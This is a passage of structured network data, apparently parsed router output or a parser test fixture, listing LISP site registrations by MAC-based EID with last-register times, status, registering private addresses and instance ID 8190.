"last_register": "never",
"up": "no",
"who_last_registered": "--",
"inst_id": 8190,
},
"000f.44ff.8b76/48": {
"last_register": "21:28:40",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8190,
},
"0010.83ff.54ab/48": {
"last_register": "4d23h",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"0018.feff.7f87/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"0019.17ff.73a7/48": {
"last_register": "5d08h",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"0019.17ff.6bc8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8190,
},
"0019.17ff.6bd1/48": {
"last_register": "1w5d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"0019.17ff.6b1d/48": {
"last_register": "5d09h",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8190,
},
"0019.17ff.6b2a/48": {
"last_register": "5d09h",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"0019.17ff.fb7f/48": {
"last_register": "6d08h",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8190,
},
"001f.c6ff.63b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8190,
},
"0023.68ff.e685/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"0023.68ff.1a9d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"0023.68ff.4b9a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"0023.68ff.4ccf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"0023.68ff.4cf1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"0023.68ff.4c4b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"0023.68ff.4c69/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8190,
},
"0023.68ff.4c7e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"0023.68ff.4e4e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8190,
},
"0023.68ff.4fc2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"0023.68ff.51e1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"0023.68ff.5428/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"0023.68ff.5530/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"0024.d6ff.394d/48": {
"last_register": "00:48:59",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"0024.d6ff.8793/48": {
"last_register": "00:37:10",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8190,
},
"0026.73ff.20f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"0050.b6ff.3ed8/48": {
"last_register": "00:22:29",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8190,
},
"0050.b6ff.f623/48": {
"last_register": "00:12:54",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"005d.73ff.585b/48": {
"last_register": "1d07h",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8190,
},
"00e0.70ff.56d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"00e0.c9ff.56e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8190,
},
"00e0.c9ff.0375/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"00e0.c9ff.5ace/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8190,
},
"020a.c1ff.3d01/48": {
"last_register": "20:18:31",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"04d4.c4ff.d068/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8190,
},
"04ed.33ff.fd35/48": {
"last_register": "04:08:32",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"04ed.33ff.2488/48": {
"last_register": "00:11:17",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"08d4.6aff.09c9/48": {
"last_register": "00:03:10",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"0cd7.46ff.7ba9/48": {
"last_register": "00:04:12",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"0e0b.ccff.4074/48": {
"last_register": "00:05:19",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8190,
},
"10f9.20ff.e77f/48": {
"last_register": "13:52:49",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8190,
},
"1418.77ff.0518/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"144f.8aff.4b55/48": {
"last_register": "02:13:47",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"144f.8aff.e6b5/48": {
"last_register": "03:49:10",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"144f.8aff.f1c3/48": {
"last_register": "03:16:36",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"147d.daff.dcde/48": {
"last_register": "00:17:47",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8190,
},
"14ab.c5ff.3b26/48": {
"last_register": "00:08:05",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"160e.f9ff.4ff6/48": {
"last_register": "00:40:05",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8190,
},
"181d.eaff.4d4a/48": {
"last_register": "00:20:58",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"1c1a.dfff.030e/48": {
"last_register": "4d01h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"1c69.7aff.8e57/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8190,
},
"1eb8.08ff.dbe5/48": {
"last_register": "00:04:46",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"2477.03ff.f002/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"28c6.3fff.6282/48": {
"last_register": "00:04:31",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"28c6.3fff.331f/48": {
"last_register": "01:21:47",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"28c6.3fff.348c/48": {
"last_register": "00:48:32",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"309c.23ff.d4cb/48": {
"last_register": "02:44:47",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"30d9.d9ff.4da9/48": {
"last_register": "00:11:26",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"38de.adff.7f68/48": {
"last_register": "00:19:57",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"38f9.d3ff.b38f/48": {
"last_register": "00:18:00",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"38f9.d3ff.fdc3/48": {
"last_register": "01:55:55",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"38f9.d3ff.a4ee/48": {
"last_register": "00:06:10",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"3ce1.a1ff.a6cd/48": {
"last_register": "00:19:25",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"402c.f4ff.66d5/48": {
"last_register": "2w0d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"4098.adff.2b2a/48": {
"last_register": "00:01:26",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"409c.28ff.df99/48": {
"last_register": "00:29:03",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"40a3.ccff.b7b8/48": {
"last_register": "00:09:49",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8190,
},
"40a3.ccff.8458/48": {
"last_register": "01:53:00",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"40a3.ccff.8a3e/48": {
"last_register": "00:53:59",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"40cb.c0ff.5dc9/48": {
"last_register": "00:37:43",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"4439.c4ff.50c0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"444a.dbff.dd5e/48": {
"last_register": "00:22:40",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"48a4.72ff.dc11/48": {
"last_register": "00:39:28",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8190,
},
"4a64.40ff.62d1/48": {
"last_register": "01:35:41",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"4c32.75ff.7f50/48": {
"last_register": "00:27:16",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8190,
},
"4c74.bfff.6334/48": {
"last_register": "03:32:25",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"50eb.71ff.7d74/48": {
"last_register": "02:59:28",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"5254.ddff.1c7f/48": {
"last_register": "00:04:39",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"5254.ddff.a58a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"54bf.64ff.987d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8190,
},
"54e1.adff.d965/48": {
"last_register": "00:37:34",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8190,
},
"5838.79ff.5224/48": {
"last_register": "1w4d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8190,
},
"5838.79ff.cfde/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8190,
},
"5838.79ff.c260/48": {
"last_register": "1w4d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"5838.79ff.c261/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"5838.79ff.c26d/48": {
"last_register": "1w6d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"5838.79ff.c2ae/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"5838.79ff.c200/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8190,
},
"5838.79ff.c205/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8190,
},
"5838.79ff.c36a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8190,
},
"5838.79ff.c38e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8190,
},
"5838.79ff.c394/48": {
"last_register": "1w0d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8190,
},
"5838.79ff.c3bf/48": {
"last_register": "1w4d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"5838.79ff.c3c2/48": {
"last_register": "3d00h",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"5838.79ff.c3cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8190,
},
"5838.79ff.c44e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"5838.79ff.c4f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"5838.79ff.c583/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"5838.79ff.87a7/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"58d5.0aff.1d00/48": {
"last_register": "00:09:37",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"5e28.44ff.7070/48": {
"last_register": "01:31:15",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"5ea9.78ff.b6e1/48": {
"last_register": "04:44:07",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"60f2.62ff.8285/48": {
"last_register": "03:28:48",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"6805.caff.691b/48": {
"last_register": "6d23h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"6805.caff.8a63/48": {
"last_register": "3d22h",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8190,
},
"6805.caff.3b18/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"6805.caff.3ccb/48": {
"last_register": "3d22h",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"6c0b.84ff.6a31/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"6c0b.84ff.4703/48": {
"last_register": "04:35:36",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"6c0b.84ff.5256/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8190,
},
"6c0b.84ff.6629/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"6c0b.84ff.662a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"6c3b.e5ff.7e8f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"6c3b.e5ff.01fb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8190,
},
"7020.84ff.54d0/48": {
"last_register": "1w0d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"70f3.95ff.8bd1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"74e5.f9ff.b161/48": {
"last_register": "00:02:29",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"74e5.f9ff.7e5a/48": {
"last_register": "00:09:50",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8190,
},
"787b.8aff.d6b1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8190,
},
"7c2a.31ff.13a3/48": {
"last_register": "00:22:40",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"7c76.35ff.5cc1/48": {
"last_register": "02:06:40",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"8032.53ff.77c8/48": {
"last_register": "00:07:39",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"80ed.2cff.e8b6/48": {
"last_register": "02:07:41",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"84ab.1aff.de14/48": {
"last_register": "00:12:44",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"84fd.d1ff.d2a9/48": {
"last_register": "03:05:27",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"84fd.d1ff.256e/48": {
"last_register": "00:22:43",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"8851.fbff.05b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8190,
},
"8851.fbff.2fcc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8190,
},
"88b1.11ff.789e/48": {
"last_register": "00:55:20",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"8c85.90ff.8e13/48": {
"last_register": "03:53:59",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"8c85.90ff.6b01/48": {
"last_register": "01:27:05",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"8c85.90ff.1927/48": {
"last_register": "00:12:03",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"8c85.90ff.ed0f/48": {
"last_register": "03:38:10",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8190,
},
"8c85.90ff.f1ed/48": {
"last_register": "00:12:00",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"8c85.90ff.a14d/48": {
"last_register": "02:12:34",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"8c85.90ff.05b4/48": {
"last_register": "04:11:05",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"90ac.3fff.1a80/48": {
"last_register": "06:59:46",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"90ac.3fff.1aaf/48": {
"last_register": "06:59:46",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"90ac.3fff.1acd/48": {
"last_register": "06:59:51",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"90ac.3fff.1ad7/48": {
"last_register": "06:59:58",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"90ac.3fff.1af1/48": {
"last_register": "06:59:45",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"90ac.3fff.1af8/48": {
"last_register": "06:59:59",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8190,
},
"90ac.3fff.1a03/48": {
"last_register": "06:59:49",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"90ac.3fff.1b0a/48": {
"last_register": "06:59:55",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"90ac.3fff.1b11/48": {
"last_register": "06:59:41",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"90ac.3fff.1b4e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"90ac.3fff.1b5f/48": {
"last_register": "06:59:43",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8190,
},
"90ac.3fff.1b6b/48": {
"last_register": "06:59:52",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"90ac.3fff.1b78/48": {
"last_register": "06:59:50",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"90ac.3fff.1b79/48": {
"last_register": "06:59:48",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"90ac.3fff.1b7d/48": {
"last_register": "06:59:41",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8190,
},
"90ac.3fff.2ca6/48": {
"last_register": "06:59:43",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"90ac.3fff.2cb0/48": {
"last_register": "06:59:58",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8190,
},
"90ac.3fff.2d36/48": {
"last_register": "06:59:49",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"90ac.3fff.2d7e/48": {
"last_register": "06:59:45",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"90ac.3fff.2d7f/48": {
"last_register": "06:59:52",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"90ac.3fff.2d80/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"90ac.3fff.2d83/48": {
"last_register": "06:59:45",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"90ac.3fff.2d88/48": {
"last_register": "06:59:58",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8190,
},
"90ac.3fff.2d98/48": {
"last_register": "06:59:55",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"90ac.3fff.2d9b/48": {
"last_register": "06:59:54",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"90ac.3fff.2da5/48": {
"last_register": "06:59:41",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"90ac.3fff.2da6/48": {
"last_register": "06:59:54",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"90ac.3fff.2da9/48": {
"last_register": "06:59:52",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"90ac.3fff.2daa/48": {
"last_register": "06:59:54",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"90ac.3fff.2db0/48": {
"last_register": "06:59:59",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8190,
},
"90ac.3fff.2dbf/48": {
"last_register": "06:59:53",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8190,
},
"90ac.3fff.2dc2/48": {
"last_register": "06:59:45",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"90ac.3fff.2df7/48": {
"last_register": "06:59:53",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"90ac.3fff.2d03/48": {
"last_register": "06:59:58",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"90ac.3fff.2483/48": {
"last_register": "05:26:35",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8190,
},
"90ac.3fff.2485/48": {
"last_register": "06:59:46",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"90ac.3fff.2486/48": {
"last_register": "06:59:47",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"90ac.3fff.248d/48": {
"last_register": "06:59:54",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"90ac.3fff.248e/48": {
"last_register": "06:59:56",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"90ac.3fff.2491/48": {
"last_register": "06:59:58",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8190,
},
"90ac.3fff.2494/48": {
"last_register": "06:59:50",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8190,
},
"90ac.3fff.2496/48": {
"last_register": "06:59:54",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"90ac.3fff.249c/48": {
"last_register": "06:59:58",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"90ac.3fff.249e/48": {
"last_register": "06:59:41",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8190,
},
"90ac.3fff.249f/48": {
"last_register": "06:59:56",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8190,
},
"90ac.3fff.24b4/48": {
"last_register": "06:59:50",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"90ac.3fff.24c3/48": {
"last_register": "06:59:42",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8190,
},
"90ac.3fff.24c9/48": {
"last_register": "06:59:48",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8190,
},
"90ac.3fff.24d2/48": {
"last_register": "06:59:47",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8190,
},
"90ac.3fff.24d3/48": {
"last_register": "06:59:47",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"90ac.3fff.2401/48": {
"last_register": "06:59:49",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8190,
},
"90ac.3fff.2407/48": {
"last_register": "06:59:51",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"90ac.3fff.2409/48": {
"last_register": "06:59:42",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8190,
},
"90ac.3fff.254f/48": {
"last_register": "06:59:57",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"90ac.3fff.258c/48": {
"last_register": "06:59:43",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"90ac.3fff.268b/48": {
"last_register": "06:59:43",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"90ac.3fff.2692/48": {
"last_register": "06:59:58",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"90ac.3fff.26aa/48": {
"last_register": "06:59:47",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8190,
},
"90ac.3fff.26b0/48": {
"last_register": "06:59:44",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8190,
},
"90ac.3fff.61f2/48": {
"last_register": "06:59:42",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"90e2.baff.41ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"90e2.baff.648b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"92b7.daff.501e/48": {
"last_register": "00:23:05",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"94e6.f7ff.289b/48": {
"last_register": "00:37:05",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8190,
},
"94e6.f7ff.10cd/48": {
"last_register": "00:23:48",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"983b.8fff.1e2b/48": {
"last_register": "00:14:28",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"a408.eaff.b6f3/48": {
"last_register": "00:27:37",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"a434.d9ff.75a2/48": {
"last_register": "1d02h",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"a483.e7ff.1a54/48": {
"last_register": "03:42:46",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8190,
},
"a483.e7ff.abee/48": {
"last_register": "01:31:25",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"a860.b6ff.78ce/48": {
"last_register": "2w1d",
"up": "yes#",
